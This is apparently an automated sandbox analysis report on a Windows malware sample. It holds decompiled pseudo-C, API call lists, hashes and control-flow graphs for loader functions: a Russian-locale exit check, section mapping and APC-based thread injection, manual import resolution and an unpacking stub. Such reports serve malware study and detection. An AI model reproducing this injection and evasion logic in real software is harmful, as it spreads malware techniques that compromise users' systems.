GetSystemTimeAsFileTime 5294->5306 5299 401418 5317 4012fb 5299->5317 5300->5291 5304 4018e3 5301->5304 5303 40198e 5303->5293 5304->5303 5328 4012e6 RtlAllocateHeap 5304->5328 5329 401ba9 RtlFreeHeap 5304->5329 5307 4015d8 CreateFileMappingW 5306->5307 5309 401671 GetLastError 5307->5309 5310 401629 5307->5310 5313 401652 5309->5313 5311 401642 MapViewOfFile 5310->5311 5312 401634 GetLastError 5310->5312 5311->5313 5315 401660 GetLastError 5311->5315 5312->5311 5314 40163d 5312->5314 5313->5299 5316 401668 CloseHandle 5314->5316 5315->5313 5315->5316 5316->5313 5330 401202 5317->5330 5319 401337 5322 401381 5319->5322 5326 401393 5319->5326 5343 401000 5319->5343 5354 401ba9 RtlFreeHeap 5322->5354 5326->5298 5327 401379 GetLastError 5327->5322 5328->5304 5329->5304 5355 4012e6 RtlAllocateHeap 5330->5355 5332 401210 5333 40121a GetModuleHandleA GetProcAddress 5332->5333 5337 4012c6 5332->5337 5334 401251 GetProcAddress 5333->5334 5342 4012bf 5333->5342 5336 401267 GetProcAddress 5334->5336 5334->5342 5338 40127d GetProcAddress 5336->5338 5336->5342 5337->5319 5339 401293 GetProcAddress 5338->5339 5338->5342 5340 4012a9 5339->5340 5339->5342 5356 40110b NtCreateSection 5340->5356 5342->5337 5362 401ba9 RtlFreeHeap 5342->5362 5344 4010f7 5343->5344 5346 401023 5343->5346 5344->5322 5349 4014cf VirtualProtect 5344->5349 5345 401034 LoadLibraryA 5345->5344 5345->5346 5346->5344 5346->5345 5348 40109d 5346->5348 5347 4010a6 GetProcAddress 5347->5348 5348->5346 5348->5347 5350 401364 5349->5350 5351 401518 5349->5351 5350->5322 5350->5327 5351->5350 5352 40156e VirtualProtect 5351->5352 5352->5351 5353 401583 GetLastError 5352->5353 5353->5351 5354->5326 5355->5332 5357 40116f 5356->5357 5361 40119c 5356->5361 5363 401459 NtMapViewOfSection 5357->5363 5360 401183 memset 5360->5361 5361->5342 5362->5337 5364 40117d 5363->5364 5364->5360 5364->5361

                Control-flow Graph

                C-Code - Quality: 85%
                			E004019F1() {
                				long _v8;
                				char _v12;
                				char _v16;
                				void* _v40;
                				long _t28;
                				long _t30;
                				long _t31;
                				signed short _t33;
                				void* _t37;
                				long _t40;
                				long _t41;
                				void* _t48;
                				intOrPtr _t50;
                				signed int _t57;
                				signed int _t58;
                				long _t63;
                				long _t65;
                				intOrPtr _t66;
                				void* _t71;
                				void* _t75;
                				signed int _t77;
                				signed int _t78;
                				void* _t82;
                				intOrPtr* _t83;
                
                				_t28 = E00401D68();
                				_v8 = _t28;
                				if(_t28 != 0) {
                					return _t28;
                				}
                				do {
                					_t77 = 0;
                					_v12 = 0;
                					_t63 = 0x30;
                					do {
                						_t71 = E004012E6(_t63);
                						if(_t71 == 0) {
                							_v8 = 8;
                						} else {
                							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                							_t67 = _t57;
                							_t58 = _t57 & 0x0000ffff;
                							_v8 = _t58;
                							if(_t58 == 4) {
                								_t63 = _t63 + 0x30;
                							}
                							_t78 = 0x13;
                							_t10 = _t67 + 1; // 0x1
                							_t77 =  *_t71 % _t78 + _t10;
                							E00401BA9(_t71);
                						}
                					} while (_v8 != 0);
                					_t30 = E00401688(_t77); // executed
                					_v8 = _t30;
                					Sleep(_t77 << 4); // executed
                					_t31 = _v8;
                				} while (_t31 == 0x15);
                				if(_t31 != 0) {
                					L30:
                					return _t31;
                				}
                				_v12 = 0;
                				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                				if(_t33 == 0) {
                					__imp__GetSystemDefaultUILanguage();
                					_t67 =  &_v12;
                					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                				}
                				if(_v12 == 0x5552) {
                					L28:
                					_t31 = _v8;
                					if(_t31 == 0xffffffff) {
                						_t31 = GetLastError();
                					}
                					goto L30;
                				} else {
                					if(E00401800(_t67,  &_v16) != 0) {
                						 *0x404178 = 0;
                						L20:
                						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                						_t82 = _t37;
                						if(_t82 == 0) {
                							L27:
                							_v8 = GetLastError();
                							goto L28;
                						}
                						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                						if(_t40 == 0) {
                							_t65 = GetLastError();
                							TerminateThread(_t82, _t65);
                							CloseHandle(_t82);
                							_t82 = 0;
                							SetLastError(_t65);
                						}
                						if(_t82 == 0) {
                							goto L27;
                						} else {
                							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                							_v8 = _t41;
                							if(_t41 == 0) {
                								GetExitCodeThread(_t82,  &_v8);
                							}
                							CloseHandle(_t82);
                							goto L28;
                						}
                					}
                					_t66 = _v16;
                					_t83 = __imp__GetLongPathNameW;
                					_t48 =  *_t83(_t66, 0, 0); // executed
                					_t75 = _t48;
                					if(_t75 == 0) {
                						L18:
                						 *0x404178 = _t66;
                						goto L20;
                					}
                					_t22 = _t75 + 2; // 0x2
                					_t50 = E004012E6(_t75 + _t22);
                					 *0x404178 = _t50;
                					if(_t50 == 0) {
                						goto L18;
                					}
                					 *_t83(_t66, _t50, _t75); // executed
                					E00401BA9(_t66);
                					goto L20;
                				}
                			}



























                0x004019f7
                0x004019fc
                0x00401a01
                0x00401ba8
                0x00401ba8
                0x00401a0a
                0x00401a0a
                0x00401a0e
                0x00401a11
                0x00401a12
                0x00401a18
                0x00401a1c
                0x00401a53
                0x00401a1e
                0x00401a26
                0x00401a2c
                0x00401a2e
                0x00401a33
                0x00401a39
                0x00401a3b
                0x00401a3b
                0x00401a42
                0x00401a48
                0x00401a48
                0x00401a4c
                0x00401a4c
                0x00401a5a
                0x00401a61
                0x00401a6a
                0x00401a6d
                0x00401a73
                0x00401a76
                0x00401a7f
                0x00401ba4
                0x00000000
                0x00401ba6
                0x00401a92
                0x00401a95
                0x00401a9d
                0x00401a9f
                0x00401aaa
                0x00401ab2
                0x00401ab2
                0x00401ac0
                0x00401b96
                0x00401b96
                0x00401b9c
                0x00401b9e
                0x00401b9e
                0x00000000
                0x00401ac6
                0x00401ad1
                0x00401b0f
                0x00401b15
                0x00401b27
                0x00401b2d
                0x00401b31
                0x00401b8d
                0x00401b93
                0x00000000
                0x00401b93
                0x00401b3d
                0x00401b4b
                0x00401b53
                0x00401b57
                0x00401b5e
                0x00401b61
                0x00401b63
                0x00401b63
                0x00401b6b
                0x00000000
                0x00401b6d
                0x00401b70
                0x00401b76
                0x00401b7b
                0x00401b82
                0x00401b82
                0x00401b89
                0x00000000
                0x00401b89
                0x00401b6b
                0x00401ad3
                0x00401ad8
                0x00401adf
                0x00401ae1
                0x00401ae5
                0x00401b07
                0x00401b07
                0x00000000
                0x00401b07
                0x00401ae7
                0x00401aec
                0x00401af1
                0x00401af8
                0x00000000
                0x00000000
                0x00401afd
                0x00401b00
                0x00000000
                0x00401b00

                APIs
                  • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                  • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                  • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                  • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                • CreateThread.KERNEL32 ref: 00401B27
                • QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 3475612337-0
                • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 132 4015b0-401607 GetSystemTimeAsFileTime 135 401609 132->135 136 40160e-401627 CreateFileMappingW 132->136 135->136 137 401671-401677 GetLastError 136->137 138 401629-401632 136->138 141 401679-40167f 137->141 139 401642-401650 MapViewOfFile 138->139 140 401634-40163b GetLastError 138->140 143 401660-401666 GetLastError 139->143 144 401652-40165e 139->144 140->139 142 40163d-401640 140->142 145 401668-40166f CloseHandle 142->145 143->141 143->145 144->141 145->141
                C-Code - Quality: 69%
                			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                				intOrPtr _v12;
                				struct _FILETIME* _v16;
                				short _v60;
                				struct _FILETIME* _t14;
                				intOrPtr _t15;
                				long _t18;
                				void* _t19;
                				void* _t22;
                				intOrPtr _t31;
                				long _t32;
                				void* _t34;
                
                				_t31 = __edx;
                				_t14 =  &_v16;
                				GetSystemTimeAsFileTime(_t14);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v12);
                				_push(_v16);
                				L00402026();
                				_push(_t14);
                				_v16 = _t14;
                				_t15 =  *0x404184;
                				_push(_t15 + 0x4051ca);
                				_push(_t15 + 0x4051c0);
                				_push(0x16);
                				_push( &_v60);
                				_v12 = _t31;
                				L00402020();
                				_t18 = _a4;
                				if(_t18 == 0) {
                					_t18 = 0x1000;
                				}
                				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                				_t34 = _t19;
                				if(_t34 == 0) {
                					_t32 = GetLastError();
                				} else {
                					if(_a4 != 0 || GetLastError() == 0xb7) {
                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                						if(_t22 == 0) {
                							_t32 = GetLastError();
                							if(_t32 != 0) {
                								goto L9;
                							}
                						} else {
                							 *_a8 = _t34;
                							 *_a12 = _t22;
                							_t32 = 0;
                						}
                					} else {
                						_t32 = 2;
                						L9:
                						CloseHandle(_t34);
                					}
                				}
                				return _t32;
                			}














                0x004015b0
                0x004015b9
                0x004015bd
                0x004015c3
                0x004015c8
                0x004015cd
                0x004015d0
                0x004015d3
                0x004015d8
                0x004015d9
                0x004015dc
                0x004015e7
                0x004015ee
                0x004015f2
                0x004015f4
                0x004015f5
                0x004015f8
                0x004015fd
                0x00401607
                0x00401609
                0x00401609
                0x0040161d
                0x00401623
                0x00401627
                0x00401677
                0x00401629
                0x00401632
                0x00401648
                0x00401650
                0x00401662
                0x00401666
                0x00000000
                0x00000000
                0x00401652
                0x00401655
                0x0040165a
                0x0040165c
                0x0040165c
                0x0040163d
                0x0040163f
                0x00401668
                0x00401669
                0x00401669
                0x00401632
                0x0040167f

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                • String ID:
                • API String ID: 3812556954-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 255 40110b-40116d NtCreateSection 256 4011a4-4011a8 255->256 257 40116f-401178 call 401459 255->257 263 4011aa-4011b0 256->263 259 40117d-401181 257->259 261 401183-40119a memset 259->261 262 40119c-4011a2 259->262 261->263 262->263
                C-Code - Quality: 72%
                			E0040110B(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E00401459(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}


















                0x00401114
                0x0040111b
                0x0040111c
                0x0040111d
                0x0040111e
                0x0040111f
                0x00401130
                0x00401134
                0x00401148
                0x0040114b
                0x0040114e
                0x00401155
                0x00401158
                0x0040115f
                0x00401162
                0x00401165
                0x00401168
                0x0040116d
                0x004011a8
                0x0040116f
                0x00401172
                0x00401178
                0x0040117d
                0x00401181
                0x0040119f
                0x00401183
                0x0040118a
                0x00401198
                0x00401198
                0x00401181
                0x004011b0

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                • memset.NTDLL ref: 0040118A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 374 401000-40101d 375 401103-401108 374->375 376 401023-40102d 374->376 376->375 377 401033 376->377 378 401034-401043 LoadLibraryA 377->378 379 4010f9-4010ff 378->379 380 401049-40105f 378->380 383 401102 379->383 381 401061-401065 380->381 382 401067-40106f 380->382 381->382 384 4010e5-4010f1 381->384 385 4010d4-4010d8 382->385 383->375 384->378 388 4010f7 384->388 386 401071 385->386 387 4010da 385->387 389 401073-401075 386->389 390 401077-401079 386->390 387->384 388->383 391 401087-40108a 389->391 392 40107b-401085 390->392 393 40108c-401093 390->393 394 401096-40109b 391->394 392->391 392->393 393->394 395 4010a2 394->395 396 40109d-4010a0 394->396 397 4010a6-4010b2 GetProcAddress 395->397 396->397 398 4010b4-4010b9 397->398 399 4010dc-4010e2 397->399 400 4010c3-4010d1 398->400 401 4010bb-4010c1 398->401 399->384 400->385 401->400
                C-Code - Quality: 100%
                			E00401000(void* __edi, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr* _v12;
                				_Unknown_base(*)()** _v16;
                				signed int _v20;
                				signed short _v24;
                				struct HINSTANCE__* _v28;
                				intOrPtr _t43;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t47;
                				intOrPtr* _t49;
                				intOrPtr _t50;
                				signed short _t51;
                				_Unknown_base(*)()* _t53;
                				CHAR* _t54;
                				_Unknown_base(*)()* _t55;
                				void* _t58;
                				signed int _t59;
                				_Unknown_base(*)()* _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				signed int _t68;
                				void* _t69;
                				CHAR* _t71;
                				signed short* _t73;
                
                				_t69 = __edi;
                				_v20 = _v20 & 0x00000000;
                				_t59 =  *0x404180;
                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                				if(_t43 != 0) {
                					_t45 = _t43 + __edi;
                					_v12 = _t45;
                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                					if(_t46 != 0) {
                						while(1) {
                							_t71 = _t46 + _t69;
                							_t47 = LoadLibraryA(_t71); // executed
                							_v28 = _t47;
                							if(_t47 == 0) {
                								break;
                							}
                							_v24 = _v24 & 0x00000000;
                							 *_t71 = _t59 - 0x43175ac3;
                							_t49 = _v12;
                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                							_t50 =  *_t49;
                							if(_t50 != 0) {
                								L6:
                								_t73 = _t50 + _t69;
                								_v16 = _t61 + _t69;
                								while(1) {
                									_t51 =  *_t73;
                									if(_t51 == 0) {
                										break;
                									}
                									if(__eflags < 0) {
                										__eflags = _t51 - _t69;
                										if(_t51 < _t69) {
                											L12:
                											_t21 =  &_v8;
                											 *_t21 = _v8 & 0x00000000;
                											__eflags =  *_t21;
                											_v24 =  *_t73 & 0x0000ffff;
                										} else {
                											_t65 = _a4;
                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                												goto L12;
                											} else {
                												goto L11;
                											}
                										}
                									} else {
                										_t51 = _t51 + _t69;
                										L11:
                										_v8 = _t51;
                									}
                									_t53 = _v8;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										_t54 = _v24 & 0x0000ffff;
                									} else {
                										_t54 = _t53 + 2;
                									}
                									_t55 = GetProcAddress(_v28, _t54);
                									__eflags = _t55;
                									if(__eflags == 0) {
                										_v20 = _t59 - 0x43175a44;
                									} else {
                										_t68 = _v8;
                										__eflags = _t68;
                										if(_t68 != 0) {
                											 *_t68 = _t59 - 0x43175ac3;
                										}
                										 *_v16 = _t55;
                										_t58 = _t59 * 4 - 0xc5d6b08;
                										_t73 = _t73 + _t58;
                										_t32 =  &_v16;
                										 *_t32 = _v16 + _t58;
                										__eflags =  *_t32;
                										continue;
                									}
                									goto L23;
                								}
                							} else {
                								_t50 = _t61;
                								if(_t61 != 0) {
                									goto L6;
                								}
                							}
                							L23:
                							_v12 = _v12 + 0x14;
                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                							if(_t46 != 0) {
                								continue;
                							} else {
                							}
                							L26:
                							goto L27;
                						}
                						_t60 = _t59 + 0xbce8a5bb;
                						__eflags = _t60;
                						_v20 = _t60;
                						goto L26;
                					}
                				}
                				L27:
                				return _v20;
                			}




























                0x00401000
                0x00401009
                0x0040100e
                0x00401014
                0x0040101d
                0x00401023
                0x00401025
                0x00401028
                0x0040102d
                0x00401034
                0x00401034
                0x00401038
                0x0040103e
                0x00401043
                0x00000000
                0x00000000
                0x00401049
                0x00401053
                0x00401055
                0x00401058
                0x0040105b
                0x0040105f
                0x00401067
                0x00401069
                0x0040106c
                0x004010d4
                0x004010d4
                0x004010d8
                0x00000000
                0x00000000
                0x00401071
                0x00401077
                0x00401079
                0x0040108c
                0x0040108f
                0x0040108f
                0x0040108f
                0x00401093
                0x0040107b
                0x0040107b
                0x00401083
                0x00401085
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00401085
                0x00401073
                0x00401073
                0x00401087
                0x00401087
                0x00401087
                0x00401096
                0x00401099
                0x0040109b
                0x004010a2
                0x0040109d
                0x0040109d
                0x0040109d
                0x004010aa
                0x004010b0
                0x004010b2
                0x004010e2
                0x004010b4
                0x004010b4
                0x004010b7
                0x004010b9
                0x004010c1
                0x004010c1
                0x004010c6
                0x004010c8
                0x004010cf
                0x004010d1
                0x004010d1
                0x004010d1
                0x00000000
                0x004010d1
                0x00000000
                0x004010b2
                0x00401061
                0x00401061
                0x00401065
                0x00000000
                0x00000000
                0x00401065
                0x004010e5
                0x004010e5
                0x004010ec
                0x004010f1
                0x00000000
                0x00000000
                0x004010f7
                0x00401102
                0x00000000
                0x00401102
                0x004010f9
                0x004010f9
                0x004010ff
                0x00000000
                0x004010ff
                0x0040102d
                0x00401103
                0x00401108

                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 443 401459-40148b NtMapViewOfSection 444 401491 443->444 445 40148d-40148f 443->445 446 401495-401498 444->446 445->446
                C-Code - Quality: 68%
                			E00401459(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}







                0x0040146b
                0x00401471
                0x0040147f
                0x00401486
                0x0040148b
                0x00401491
                0x00000000
                0x00401492
                0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 46 4d003c-4d0047 47 4d004c-4d0263 call 4d0a3f call 4d0e0f call 4d0d90 VirtualAlloc 46->47 48 4d0049 46->48 64 4d028b-4d0292 47->64 65 4d0265-4d0289 call 4d0a69 47->65 48->47 67 4d02a1-4d02b0 64->67 68 4d02ce-4d03c2 VirtualProtect call 4d0cce call 4d0ce7 65->68 67->68 69 4d02b2-4d02cc 67->69 76 4d03d1-4d03e0 68->76 69->68 71 4d0294-4d029b 69->71 71->67 77 4d0439-4d04b8 VirtualFree 76->77 78 4d03e2-4d0437 call 4d0ce7 76->78 80 4d04be-4d04cd 77->80 81 4d05f4-4d05fe 77->81 78->76 85 4d04d3-4d04dd 80->85 82 4d077f-4d0789 81->82 83 4d0604-4d060d 81->83 86 4d078b-4d07a3 82->86 87 4d07a6-4d07b0 82->87 83->82 88 4d0613-4d0637 83->88 85->81 90 4d04e3-4d0505 85->90 86->87 91 4d086e-4d08be LoadLibraryA 87->91 92 4d07b6-4d07cb 87->92 93 4d063e-4d0648 88->93 98 4d0517-4d0520 90->98 99 4d0507-4d0515 90->99 97 4d08c7-4d08f9 91->97 95 4d07d2-4d07d5 92->95 93->82 96 4d064e-4d065a 93->96 100 4d0824-4d0833 95->100 101 4d07d7-4d07e0 95->101 96->82 102 4d0660-4d066a 96->102 103 4d08fb-4d0901 97->103 104 4d0902-4d091d 97->104 105 4d0526-4d0547 98->105 99->105 109 4d0839-4d083c 100->109 106 4d07e4-4d0822 101->106 107 4d07e2 101->107 108 4d067a-4d0689 102->108 103->104 110 4d054d-4d0550 105->110 106->95 107->100 111 4d068f-4d06b2 108->111 112 4d0750-4d077a 108->112 109->91 113 4d083e-4d0847 109->113 115 4d0556-4d056b 110->115 116 4d05e0-4d05ef 110->116 117 4d06ef-4d06fc 111->117 118 4d06b4-4d06ed 111->118 112->93 119 4d0849 113->119 120 4d084b-4d086c 113->120 121 4d056d 115->121 122 4d056f-4d057a 115->122 116->85 123 4d06fe-4d0748 117->123 124 4d074b 117->124 118->117 119->91 120->109 121->116 125 4d057c-4d0599 122->125 126 4d059b-4d05bb 122->126 123->124 124->108 131 4d05bd-4d05db 125->131 126->131 